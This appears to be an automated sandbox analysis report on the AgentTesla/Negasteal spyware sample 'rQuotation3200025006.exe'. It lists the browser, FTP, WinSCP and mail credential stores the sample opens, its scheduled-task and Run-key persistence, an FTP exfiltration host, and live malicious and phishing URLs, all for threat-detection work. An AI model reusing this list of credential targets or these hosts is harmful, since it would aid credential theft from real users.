                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 2756, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pBBqGOzrz.exe PID: 7616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7188, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.0000000003241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4164492788.0000000003501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4163306810.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rQuotation3200025006.exe PID: 2756, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: pBBqGOzrz.exe PID: 7616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 8012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7188, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 112 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Hidden Files and Directories
Credential Access: 2 OS Credential Dumping; 31 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 31 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
2 Behavior Graph ID: 1520520 Sample: rQuotation3200025006.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100
65 ftp.haliza.com.my 2->65
67 api.ipify.org 2->67
73 Suricata IDS alerts for network traffic 2->73
75 Found malware configuration 2->75
77 Malicious sample detected (through community Yara rule) 2->77
79 12 other signatures 2->79
8 rQuotation3200025006.exe 7 2->8 started
12 pBBqGOzrz.exe 2->12 started
14 sgxIb.exe 2->14 started
16 sgxIb.exe 2->16 started
57 C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, PE32 8->57 dropped
59 C:\Users\...\pBBqGOzrz.exe:Zone.Identifier, ASCII 8->59 dropped
61 C:\Users\user\AppData\Local\Temp\tmp3D2.tmp, XML 8->61 dropped
63 C:\Users\...\rQuotation3200025006.exe.log, ASCII 8->63 dropped
95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->95
97 Contains functionality to register a low level keyboard hook 8->97
99 Uses schtasks.exe or at.exe to add and modify task schedules 8->99
101 Adds a directory exclusion to Windows Defender 8->101
18 rQuotation3200025006.exe 16 5 8->18 started
23 powershell.exe 23 8->23 started
33 2 other processes 8->33
103 Multi AV Scanner detection for dropped file 12->103
105 Machine Learning detection for dropped file 12->105
107 Injects a PE file into a foreign processes 12->107
25 pBBqGOzrz.exe 12->25 started
35 2 other processes 12->35
27 sgxIb.exe 14->27 started
37 4 other processes 14->37
29 sgxIb.exe 16->29 started
31 schtasks.exe 16->31 started
69 ftp.haliza.com.my 110.4.45.197, 21, 49736, 49737 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 18->69
71 api.ipify.org 104.26.12.205, 443, 49733, 49740 CLOUDFLARENETUS United States 18->71
53 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 18->53 dropped
55 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 18->55 dropped
81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->81
83 Tries to steal Mail credentials (via file / registry access) 18->83
85 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->85
87 Loading BitLocker PowerShell Module 23->87
39 conhost.exe 23->39 started
41 WmiPrvSE.exe 23->41 started
89 Tries to harvest and steal ftp login credentials 29->89
91 Tries to harvest and steal browser information (history, passwords, etc) 29->91
93 Installs a global keyboard hook 29->93
43 conhost.exe 31->43 started
45 conhost.exe 33->45 started
47 conhost.exe 33->47 started
49 conhost.exe 35->49 started
51 conhost.exe 37->51 started

Source | Detection | Scanner | Label
rQuotation3200025006.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
rQuotation3200025006.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\pBBqGOzrz.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\pBBqGOzrz.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 58% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal

No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | unknown
ftp.haliza.com.my | 110.4.45.197 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
110.4.45.197 | ftp.haliza.com.my | Malaysia | 46015 | EXABYTES-AS-APExaBytesNetworkSdnBhdMY | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520520
Start date and time: 2024-09-27 13:09:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rQuotation3200025006.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@39/20@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 415
                              • Number of non-executed functions: 30
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: rQuotation3200025006.exe

Time | Type | Description
07:09:58 | API Interceptor | 6782479x Sleep call for process: rQuotation3200025006.exe modified
07:10:01 | API Interceptor | 74x Sleep call for process: powershell.exe modified
07:10:04 | API Interceptor | 1539219x Sleep call for process: pBBqGOzrz.exe modified
07:10:17 | API Interceptor | 5531601x Sleep call for process: sgxIb.exe modified
12:10:03 | Task Scheduler | Run new task: pBBqGOzrz path: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
12:10:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
12:10:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Vidar | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.12.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
110.4.45.197 | z38PO_20248099-1_pdf.exe | malicious | AgentTesla |
110.4.45.197 | z64MT103_126021720924_pdf.exe | malicious | AgentTesla |
110.4.45.197 | rPO_20248099-112,300PCS.exe | malicious | AgentTesla |
110.4.45.197 | PO__20248099-1 12,300PCS.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | mSLEwIfTGL.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
api.ipify.org | RTGS-WB-ABS-240730-NEW.lnk | malicious | AgentTesla | 172.67.74.152
api.ipify.org | Purchase order.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | https://mzansibonds.com/dshk/tmpasdfghjklkjhgfdewertyuioiuytresdxcvbnmnbvfcdsew345678987654rewsdfvgbhnjhbgvfdesw23e45678uijdhgfcsvzbdncqasdcxw.php | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | http://correctingservicesalakks.pages.dev/ | malicious | Unknown | 104.26.12.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 104.26.12.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 104.26.12.205
api.ipify.org | https://lothanse-heracklarne.pages.dev/help/contact/547074160798771 | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 172.67.74.152
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | 104.26.13.205
ftp.haliza.com.my | z38PO_20248099-1_pdf.exe | malicious | AgentTesla | 110.4.45.197
ftp.haliza.com.my | z64MT103_126021720924_pdf.exe | malicious | AgentTesla | 110.4.45.197
ftp.haliza.com.my | rPO_20248099-112,300PCS.exe | malicious | AgentTesla | 110.4.45.197
ftp.haliza.com.my | PO__20248099-1 12,300PCS.exe | malicious | AgentTesla | 110.4.45.197

                                      • 110.4.45.197
                                      PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                                      • 110.4.45.197
                                      https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                                      • 43.252.214.42
                                      https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                                      • 43.252.214.42
                                      https://trk.klclick3.com/ls/click?upn=%75001%2ec09Q0Iaa5JBKaMwLC9cMjFMyHYn-2B6EZxbTX-2FaxXPaGrg5dbeFH4fD3EuQFBIIXLREGZ-2FcOKC34mnxZPxIQx7XghFIqGaXY6alnacloe8xRo-3DgClE_PsKyq3SDuMFd2Bvwnm7-2BcmPfS0aZrbIGf331gXNHUSe-2BhQgqUpFiX3w7h5jUnRd6n-2FE8HERNVnz6BOvKs-2F6ulrBAPhqq4y7BxG-2Bd6kG7tLUxcOuHiFWpTHeDGZUnvDZvP6FM52V2kHQ6WJAZs6KQLxfqZHXfS07MTZdpG9vj-2FyhrEPsl2OqZg5lzEsrvURNsKVvDj6AmF6Sc1Z4lZAW7CGdtCrIGzdnodzXHJg2ktm7ptAUSv125vaGKXpRXhbzmAu5lE-2BvgScXpoVnTswlbot2XqG-2FJI21NuECHLJYOtT13mulLg3LyC43ioSpIwstqzATUDNosl6pb3KNNf3I-2F07dDO2NkZcrZt-2B2G5uraxeQ-3D#/?/c3plbGxAam9uZXNqdW5jdGlvbi5jb20=Get hashmaliciousUnknownBrowse
                                      • 103.6.198.53
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0e.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.26.12.205
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
                                      https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61becGet hashmaliciousUnknownBrowse
                                      • 104.26.12.205
